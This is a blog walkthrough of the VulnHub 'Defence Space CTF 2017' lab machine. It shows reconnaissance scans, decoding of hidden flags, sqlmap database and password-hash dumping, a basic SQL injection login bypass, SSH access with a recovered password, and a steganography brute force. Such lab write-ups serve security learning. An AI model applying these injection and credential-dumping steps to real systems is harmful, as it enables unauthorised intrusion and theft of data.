6 July 2022

Pentesting Fun Stuff

following the cyber security path…

Defence Space CTF: 2017

Location

https://download.vulnhub.com/defencectf2017/DEFENCESPACECTF-2017.ova

Description

The story line on the CTF is based on true life happening in Northern Nigeria, however the author has adopted the code name “Operation Lafia dole”.
The exercise start from simple information gathering, which is applicable to both military and cyber based operation, to complex infiltration and encryption been used by intelligence agency around the world to pass out secret.
It has 7 flags to be captured.

Getting started

Because the box runs on a static IP adres I need to change my network settings of Vbox. When that’s done I can start with a port/service scan.

┌─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -p- 192.168.56.20
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-27 18:00 CEST
Nmap scan report for 192.168.56.20
Host is up (0.0025s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD 1.3.5a
80/tcp   open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Operation LAFIYA DOLE CTF 2017 - INFLITRATE THE OPERATION COMM...
443/tcp  open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Operation LAFIYA DOLE CTF 2017 - INFLITRATE THE OPERATION COMM...
| ssl-cert: Subject: commonName=Flag3[19c562a36aeb455d093b4f5236f]+[39 39 30]/organizationName=Silex Secure Lab Ltd/stateOrProvinceName=Abuja/countryName=NG
| Not valid before: 2017-01-24T12:54:41
|_Not valid after:  2018-01-24T12:54:41
|_ssl-date: ERROR: Script execution failed (use -d to debug)
2225/tcp open  ssh      OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f6:f0:08:c9:4d:16:3d:fd:e7:b8:51:d7:b6:57:48:5d (RSA)
|_  256 c2:2b:6e:83:8a:00:67:c2:39:62:16:5e:f9:01:ee:fe (ECDSA)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.47 seconds

FTP, HTTP, HTTPS and SSH on a non-standard port. Let’s get a feel of the challenge.

In the source code of the page there is an interesting piece.

<!-- Scripts -->
      <script src="assets/js/jquery.min.js"></script>
      <script src="assets/js/skel.min.js"></script>
      <script src="assets/js/util.js"></script>
      <script src="RmxhZyAwIChuZXRkaXNjb3Zlcik="></script>
      <script src="assets/lafiya.js"></script><![Make sure you stick to intel gathering agent]<!-->
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'RmxhZyAwIChuZXRkaXNjb3Zlcik=' | base64 -d
Flag 0 (netdiscover)

Uhm….first flag?
Next I examine the javascript files. ‘/assets/lafiya.js’ had 2 things that caught my eye.

/* 46 6c 61 67 20 32 20 39 61 38 37 38 30 32 38 31 64 33 65 33 37 63 35 39 37 63 65 65 37 63 61 35 38 62 66 64 34 33 35 0a*/
└──╼ $echo '46 6c 61 67 20 32 20 39 61 38 37 38 30 32 38 31 64 33 65 33 37 63 35 39 37 63 65 65 37 63 61 35 38 62 66 64 34 33 35 0a' | xxd -r -p
Flag 2 9a8780281d3e37c597cee7ca58bfd435

Flag number 2. Which looks like a MD5 string.

9a8780281d3e37c597cee7ca58bfd435 -> Nmap

The second thing was in the same file.

/* Beheaded Air Force   */
/*  There is a big shoe to fill. Lord I need your feet.. 11/08/2014  c.hedima@airforce.mil.ng maps/kanuri/Borno/@11.8664433,10.9088387,7z/data=!3m1!4b1!4m5!3m4!1s0x111b0751329a9727:0xe4d749d5b2177a1d!8m2!3d11.5097479!4d12.9789121  Bama1987 */

Next I ran Nikto.

┌─[n13mant@planetmars]─[~]
└──╼ $nikto -h 'http://192.168.56.20/'
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.20
+ Target Hostname:    192.168.56.20
+ Target Port:        80
+ Start Time:         2017-03-27 19:36:20 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xf7d 0x549619ce6fe2c
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.0.1/images/".
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ Uncommon header 'x-permitted-cross-domain-policies' found, with contents: none
+ Uncommon header 'x-robots-tag' found, with contents: noindex, nofollow
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /phpmyadmin/: phpMyAdmin directory found
+ 7686 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2017-03-27 19:37:10 (GMT2) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
  • phpinfo() found
  • phpMyAdmin found

When I connect with the SSH server I get another flag.

┌─[n13mant@planetmars]─[~]
└──╼ $ssh 192.168.56.20 -p 2225
The authenticity of host '[192.168.56.20]:2225 ([192.168.56.20]:2225)' can't be established.
ECDSA key fingerprint is SHA256:8sIalXp1GsXRzq1v9LpWHz84w229mDlUIjrc9Ahm3lU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.56.20]:2225' (ECDSA) to the list of known hosts.
###############################################################################################
                                        WARNING
                     DHQ:NIG  DSS-NIG DIA-NIG - Authorized Access Only!
      Disconnect IMMEDIATELY if you are not an authorized User in Operation Lafia Dole
                All actions Will be Closely Monitored and Recorded by Cam7
               Flag2B[53c82eba31f6d416f331de9162ebe997]
################################################################################################
53c82eba31f6d416f331de9162ebe997 -> encrypt

Encrypt…..looks like I’m being guided to the HTTPS server.
Inside the SSL certificate there is another flag. But this time there is something added to it.

19c562a36aeb455d09534f93b4f5236f -> Unit
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $echo '39 39 30' | xxd -r -p
990

Unit+990 = Unit990
After a while and a few tries with the idea of this being an username, I tried it in my browser as a folder.

In the source code there is a comment.

<!-- "Every intelligence Analysis system must be rooted in a strong understanding of  agent's access written for." -
ZmxhZyA0IHthZG1pbi5waHB9  -->
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'ZmxhZyA0IHthZG1pbi5waHB9' | base64 -d
flag 4 {admin.php}

At the bottom there was a final comment.

<!--
  //////////////////////////////////////////////////////////////////////////////////////////////////////
// Defence| DIA| FIB | AIRFORCE| NAVY| DSA| client   authenticated connections to 2225 classified     //                       //                                                                                                    //
//                                                                                                    //
//                         .--Entering is a process here                                              //
//                         |              .--hypothetical Base64 Encoded                             //
//                         v                           v                                              //
//Db()->update('name',$_GET['newname'])->where(' id = '.$_GET[''or'1'='1']);                          //
//                                                                                                    //
///////////////////////////////////////////////////////////////////////////////////////////////////////
-->

When I follow the clue from the previous flag (admin.php) I get another login screen.
Again I check the source code. Another interesting comment but with a slight twist.

<!--
  //////////////////////////////////////////////////////////////////////////////////////////////////////
// update() sets the value of a column given a condition                                              //
//                                                                                                    //
//                         .--escaping is automatic here                                              //
//                         |              .--hypothetical RmxhZyA1IHtTUUwgaW5qZWN0aW9ufQ==            //
//                         v                           v                                              //
//Db()->update('name',$_GET['newname'])->where(' id = '.$_GET['id']);                                 //
//                                                                                                    //
///////////////////////////////////////////////////////////////////////////////////////////////////////
-->
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'RmxhZyA1IHtTUUwgaW5qZWN0aW9ufQ==' | base64 -d
Flag 5 {SQL injection}

Time to put sqlmap to work.

available databases [7]:
[*] db_audit
[*] Dhqctf
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] silex
database management system users password hashes:
[*] phpmyadmin [1]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root
[*] root [1]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root
Database: silex
[6 tables]
+--------------+
| admin        |
| categories   |
| customers    |
| formula      |
| home_type    |
| sub_category |
+--------------+
Database: silex
Table: admin
[1 entry]
+----+--------------------------------------+
| id | code                                 |
+----+--------------------------------------+
| 1  | ZmxhZyA2IHtOaWdhaXJmb3JjZWNsb3VkfQ== |
+----+--------------------------------------+
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'ZmxhZyA2IHtOaWdhaXJmb3JjZWNsb3VkfQ==' | base64 -d
flag 6 {Nigairforcecloud}

When I searched my notes for something with ‘airforce’ I noticed I missed a previous clue inside a comment I found earlier. There was a piece of code inside the comment that was very interesting.

Db()->update('name',$_GET['newname'])->where(' id = '.$_GET[''or'1'='1']);

Let’s try that basic piece of SQL injection on the login page from earlier.

┌─[n13mant@planetmars]─[~]
└──╼ $echo 'RGVmYXVsdEAxMg==' | base64 -d
Default@12

That looks like an invitation to a SSH visit.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $ssh abuali@192.168.56.20 -p 2225
###############################################################################################
                                        WARNING
                     DHQ:NIG  DSS-NIG DIA-NIG - Authorized Access Only!
      Disconnect IMMEDIATELY if you are not an authorized User in Operation Lafia Dole
                All actions Will be Closely Monitored and Recorded by Cam7
               Flag2B[53c82eba31f6d416f331de9162ebe997]
################################################################################################
abuali@192.168.56.20's password:
Welcome to Ubuntu 16.10 (GNU/Linux 4.8.0-39-generic i686)
Last login: Sat Feb 25 21:56:08 2017 from 192.168.56.20
abuali@server1:~$ id
uid=1002(abuali) gid=1002(abuali) groups=1002(abuali)
abuali@server1:/home/silex/OperationLafia$ uname -a
Linux server1 4.8.0-39-generic #42-Ubuntu SMP Mon Feb 20 11:46:49 UTC 2017 i686 i686 i686 GNU/Linux
abuali@server1:/home/silex/OperationLafia$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.10
DISTRIB_CODENAME=yakkety
DISTRIB_DESCRIPTION="Ubuntu 16.10"
NAME="Ubuntu"
VERSION="16.10 (Yakkety Yak)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.10"
VERSION_ID="16.10"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="http://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=yakkety
UBUNTU_CODENAME=yakkety

After some time inside this box I start to think this was a waste of time and I got side-tracked. Time for the admin login page and inject there some SQLi.

Fun that I got access, but this system didn’t gave me any direction on how to go on. It felt like a dead-end. Because there was a lot of information gathered I created a list with everything I found and ran it through dirsearch.

┌─[n13mant@planetmars]─[~/dirsearch]
└──╼ $python3 dirsearch.py -u http://192.168.56.20/ -e php,hmtl -x 301,404,405 -w ~/Desktop/words.dic
 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )
Extensions: php, hmtl | Threads: 10 | Wordlist size: 277315
Error Log: /home/n13mant/dirsearch/logs/errors-17-03-30_16-49-18.log
Target: http://192.168.56.20/
[16:49:18] Starting:
[16:49:18] 200 -    4KB - /
[16:49:18] 200 -    4KB - /
[.....SNIP.....]
[16:58:23] 401 -  460B  - /Nigairforcecloud
[.....SNIP.....]
[17:12:11] 200 -    4KB - /
Task Completed

401….restricted access. Bummer. But the funny thing is……when I use port 443 I don’t need any credentials to enter. The gate is wide open.

On entering I get flag number 7. Which should be the end of this funny but strange CTF.

3aa652f41d8b4a23e17937149c784868 -> widgets

But why would there be a clue inside the last and final flag? Because there is a button on the left of the dashboard that’s called ‘widgets’ I guess I’m not done yet.

There is a sound file and an image to be downloaded. As there is nothing else in here and the clue pointed directly to this page I guess there is some steganography in place. Unfortunately I need a password.
Because there is no clue where the password can be found I need to create a wordlist. Because this CTF has a story to tell, there is a lot of information throughout all the files on the website. To make the wordlist I copy the content of every file into 1 text file. With ‘sort’ and ‘grep’ I filter this file so it will consist of strings from 5 chars and more. I did it this way, because CeWL only filters out letters and nothing else. With this list I tried to brute-force both files.

┌─[n13mant@planetmars]─[~/stegbrute]
└──╼ $python steg_brute.py -b -d ~/Desktop/words.dic -f ~/Desktop/Alfajet106.wav
 [i] Searching...
 53%|############################                                                  |
 wrote extracted data to "/home/n13mant/Desktop/Alfajet106_flag.txt".
 [+] Information obtained with password: Bama1987
Imam Abubakar Shekau
Mobile Number : 091778383990
Email:abubakar.shekau@arimblog
Location : Alfata street, Behind A.g Station Borno state
Height : 7.0
Age : 40
Language : English , Kanuri, Hausa.
Religion :
Bank Account : 08878711776
Habibu Yusuf (a.k.a Asalafi)
Mobile Number : 091778383910
Email:abubakar.HabibuYusuf1@arimblog.com
Location : Sambisa forest
Borno state
Height : 4.0
Age : 25
Language : English , Kanuri, Hausa.
Religion :
Bank Account : 08878711777
Khalid Albarnawai
Mobile Number : 091778383992
Email:abubakar.khalidbaba@arimblog
Location : Maiduguri, Borno State, Nigeria
Height : 7.0
DOB : 1976
Language : English , Kanuri, Hausa.
Religion :
Bank Account : 08878711778
Momodu Bama
Mobile Number : 091778383993
Email:bamamomodu@arimblog
Location : Alfata street, Behind A.g Station Borno state
Height : 7.0
Language : English , Kanuri, Hausa.
Religion :
Bank Account : 08878711779

Guess that is it. Nothing really that marks the end.

Conclusion

This CTF was a strange one at best. No real techniques were needed and it felt more like a goose hunt. The creators really wanted to tell a story, but missed out with the challenging part. I always enjoy a themed CTF, but this one was a bit too much theme.

1 thought on “Defence Space CTF: 2017

  1. I have fun with, cause I discovered exactly what I was looking for.
    You’ve ended my four day lengthy hunt! God Bless you man. Have a great day.
    Bye

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.